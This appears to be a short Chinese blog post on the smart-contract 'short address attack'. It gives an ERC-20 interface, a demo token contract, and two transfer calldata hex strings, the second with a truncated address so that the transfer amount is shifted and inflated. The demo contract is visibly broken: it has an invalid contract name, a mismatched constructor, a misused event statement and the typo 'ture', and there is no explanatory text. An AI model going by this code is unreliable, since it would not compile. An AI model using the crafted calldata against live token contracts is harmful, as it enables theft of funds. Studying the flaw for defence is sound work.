智能合约之短地址攻击

    // Abstract contract for the full ERC 20 Token standard
    // https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md
    pragma solidity ^0.4.21;
    
    
    contract EIP20Interface {
    /* This is a slight change to the ERC20 base standard.
    function totalSupply() constant returns (uint256 supply);
    is replaced with:
    uint256 public totalSupply;
    This automatically creates a getter function for the totalSupply.
    This is moved to the base contract since public getter functions are not
    currently recognised as an implementation of the matching abstract
    function by the compiler.
    */
    /// total amount of tokens
    uint256 public totalSupply;
    
    /// @param _owner The address from which the balance will be retrieved
    /// @return The balance
    function balanceOf(address _owner) public view returns (uint256 balance);
    
    /// @notice send `_value` token to `_to` from `msg.sender`
    /// @param _to The address of the recipient
    /// @param _value The amount of token to be transferred
    /// @return Whether the transfer was successful or not
    function transfer(address _to, uint256 _value) public returns (bool success);
    
    /// @notice send `_value` token to `_to` from `_from` on the condition it is approved by `_from`
    /// @param _from The address of the sender
    /// @param _to The address of the recipient
    /// @param _value The amount of token to be transferred
    /// @return Whether the transfer was successful or not
    function transferFrom(address _from, address _to, uint256 _value) public returns (bool success);
    
    /// @notice `msg.sender` approves `_spender` to spend `_value` tokens
    /// @param _spender The address of the account able to transfer the tokens
    /// @param _value The amount of tokens to be approved for transfer
    /// @return Whether the approval was successful or not
    function approve(address _spender, uint256 _value) public returns (bool success);
    
    /// @param _owner The address of the account owning tokens
    /// @param _spender The address of the account able to transfer the tokens
    /// @return Amount of remaining tokens allowed to spent
    function allowance(address _owner, address _spender) public view returns (uint256 remaining);
    
    // solhint-disable-next-line no-simple-event-func-name
    event Transfer(address indexed _from, address indexed _to, uint256 _value);
    event Approval(address indexed _owner, address indexed _spender, uint256 _value);
    }

    a9059cbb00000000000000000000000015022eCbc4Fc993d1Fd179A41F7b985fA9C0b78700000000000000000000000000000000000000000000000000000000000000001

    pragma solidity ^0.4.21;
    
    contract Short AddressAttack{
    	 mapping(address => uint) public balances;
    	 event transfer(address indexed _from,address indexed  _to, uint256 _value);
    	
    	function AddressAttack() {
    		balances[msg.sender] = 1000;
    	}
    	
    	function transfer(address _to, uint256 _value) public returns (bool success){
    		if(balances[msg.sender] <  _value)  return false;
    		if(_value <  0)  return false;
    		
    		balances[msg.sender]  -=  _value;
    		balances[ _to]  +=  _value;
    		event transfer(msg.sender,_to,_value);
    		return ture;
    	}
    }

    a9059cbb00000000000000000000000015022eCbc4Fc993d1Fd179A41F7b985fA9C0b700000000000000000000000000000000000000000000000000000000000000001